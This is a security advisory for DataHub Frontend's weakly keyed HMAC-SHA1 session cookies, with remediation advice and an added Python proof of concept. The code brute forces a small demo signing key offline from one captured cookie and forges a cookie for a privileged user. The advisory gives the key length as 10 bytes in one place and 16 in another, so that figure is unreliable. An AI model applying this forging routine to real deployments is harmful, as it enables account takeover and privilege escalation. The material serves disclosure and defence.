Summary
DataHub Frontend session cookies were signed with HMAC-SHA1 keyed by the frontend secret key. With a 10 byte key, the signature can be brute forced by an attacker with sufficient resources (e.g. state-level actors with large computational capabilities). The weakness is the size of the key space, not SHA-1 itself: HMAC-SHA1 is not affected by SHA-1 collision attacks, but a short secret can be recovered by exhaustive search given a single valid cookie and its signature.
Details
DataHub Frontend used the Play LegacyCookiesModule with default settings, which signs the session cookie with HMAC-SHA1. This is compounded by the default helm chart generating a randomized signing secret that is shorter than recommended. An authenticated attacker (or an attacker who has otherwise obtained a session token) holds a valid cookie together with its signature and can therefore crack the signing key offline, then forge a session cookie for a more privileged user. Because key length is part of the risk, deployments should update to the latest helm chart and rotate their session signing secret; rotating the secret also invalidates every existing session cookie, including any already forged with the old key.
PoC
With a few hundred thousand dollars' worth of compute resources, a motivated actor can enumerate all combinations of the 16 byte signing key against the HMAC-SHA1 of a captured session cookie, recover the key, and re-sign the cookie with the user changed to a more privileged one. The attacker needs either to authenticate successfully to obtain a session cookie of their own or to obtain a session cookie from a logged-in user through some other means; the brute force itself then runs offline, with no further requests to the server until the forged cookie is presented.
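The following is an added worked example written for this advisory; it is not DataHub or Play Framework code. It models the attack described in Details and PoC end to end: a Play-style legacy session cookie signed with HMAC-SHA1, an offline brute force over the key space using one captured cookie, and a forged cookie for a more privileged user signed with the recovered key. The cookie layout `<hex hmac>-<data>` (with `data` as `&`-joined, percent-encoded `key=value` pairs) is assumed to mirror Play's legacy signed-cookie format; the attribute name `actor`, the user URNs, and the deliberately tiny 3-character demo key space are constructed for illustration so that the search finishes in well under a second.

```python
"""Editor's example: brute forcing a short HMAC-SHA1 session signing key.

Not DataHub or Play code. Assumed cookie format: "<hex hmac>-<data>", where
data is '&'-joined percent-encoded key=value pairs (modelled on Play's legacy
signed cookies). Attribute names, URNs and the demo key space are constructed.
"""
import hashlib
import hmac
import itertools
import math
import string
from urllib.parse import quote, unquote

ALPHANUM = string.ascii_letters + string.digits  # 62-symbol alphabet


def sign(key: bytes, data: str) -> str:
    """HMAC-SHA1 over the serialized session data, hex encoded."""
    return hmac.new(key, data.encode(), hashlib.sha1).hexdigest()


def serialize(attrs: dict) -> str:
    # quote() leaves '-' unescaped, so the first '-' in a cookie is always the
    # separator between the 40-char hex signature and the data.
    return "&".join(f"{quote(k)}={quote(v)}" for k, v in attrs.items())


def parse(data: str) -> dict:
    pairs = (p.split("=", 1) for p in data.split("&"))
    return {unquote(k): unquote(v) for k, v in pairs}


def encode_cookie(key: bytes, attrs: dict) -> str:
    data = serialize(attrs)
    return f"{sign(key, data)}-{data}"


def decode_cookie(key: bytes, cookie: str):
    """Server side: verify the signature, return attrs or None if tampered."""
    sig, _, data = cookie.partition("-")
    if not hmac.compare_digest(sig, sign(key, data)):
        return None
    return parse(data)


def recover_key(cookie: str, alphabet: str, length: int):
    """Attacker side: exhaustive offline search using one captured cookie.

    Each candidate costs one HMAC-SHA1; the server is never contacted.
    """
    sig, _, data = cookie.partition("-")
    for cand in itertools.product(alphabet, repeat=length):
        key = "".join(cand).encode()
        if hmac.compare_digest(sign(key, data), sig):
            return key
    return None


def forge_cookie(key: bytes, victim_cookie: str, **overrides) -> str:
    """Re-sign the captured cookie with selected attributes replaced."""
    _, _, data = victim_cookie.partition("-")
    attrs = parse(data)
    attrs.update(overrides)
    return encode_cookie(key, attrs)


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Effective key strength of a random string drawn from the alphabet."""
    return length * math.log2(alphabet_size)


def demo() -> dict:
    # Constructed: the server secret is 3 characters from a 36-symbol alphabet
    # (36**3 = 46,656 candidates) so the brute force is instant here.
    demo_alphabet = string.ascii_lowercase + string.digits
    server_key = b"q7z"
    # Attacker logs in as a low-privilege user and captures their own cookie.
    captured = encode_cookie(server_key, {"actor": "urn:li:corpuser:attacker"})
    cracked = recover_key(captured, demo_alphabet, 3)
    # With the key in hand, mint a cookie for a privileged user (illustrative URN).
    forged = forge_cookie(cracked, captured, actor="urn:li:corpuser:datahub")
    accepted = decode_cookie(server_key, forged)
    return {
        "cracked_key": cracked,
        "forged_actor": accepted["actor"] if accepted else None,
        "bits_10_alnum": keyspace_bits(len(ALPHANUM), 10),
        "bits_16_alnum": keyspace_bits(len(ALPHANUM), 16),
    }


if __name__ == "__main__":
    print(demo())
```

The same arithmetic explains the cost figures in the advisory: a 10-character alphanumeric secret is roughly 2^60 candidates, which a large GPU cluster can exhaust, whereas a secret with 256 bits of entropy (for example 32 random bytes) is out of reach regardless of whether the MAC is HMAC-SHA1 or HMAC-SHA256. Rotating to a long random secret is therefore the fix that matters; changing only the hash does not help.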
Impact
All deployments that use the default helm chart configuration to generate the Play secret key used for session signing.
Credit
Dor Konis - GE Vernova
Amit Laish - GE Vernova